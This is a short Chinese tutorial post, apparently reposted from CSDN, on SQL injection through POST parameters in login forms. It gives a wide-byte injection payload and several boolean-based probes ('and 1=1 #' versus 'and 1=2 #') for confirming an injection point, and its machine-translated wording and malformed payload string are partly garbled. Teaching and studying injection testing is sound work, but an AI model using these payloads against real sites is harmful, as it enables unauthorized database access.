【漏洞挖掘】——105、POST注入深入剖析

【漏洞挖掘】——105、POST注入深入剖析基本介绍
POST是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如:我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以POST的方式提交的服务器后

基本介绍

POST 主要是指从客户端向服务器发送数据。例如,频繁用户的登录模块或网站的公告板模块。您发送的所有内容将采用以下格式: POST 到服务器并由服务器验证。如果对于POST提交的参数存在注入点,则这种注入称为“POST”注入。

注入流程

POST 类型终止负载:

uname=admin%df\’or()or%200%23passwd=submit=提交

确定注入|后台sql语句

首先,通过发出以下请求来检查注入点是否存在:

POST: admin/admin # 正常显示

POST: admin\’/admin # 显示错误(错误信息/含义为虚假页面状态)

POST: admin and 1=1 #/admin # 正常显示

POST: admin and 1=2 #/admin # 显示异常(有错误信息/含义为虚假页面状态)

从上面的判断我们可以得出,除了上面构造的fuzz之外,还可能存在以下注入点:

角色类型1:

POST: admin\’ and 1=1 #/admin # 正常显示

POST: admin\’ and 1=2 #/admin # 显示异常(有错误信息/含义为虚假页面状态)

#【漏洞挖掘】——105及上文对POST注入详细分析相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91206.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月21日 下午6:51
下一篇 2024年6月21日 下午6:51

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注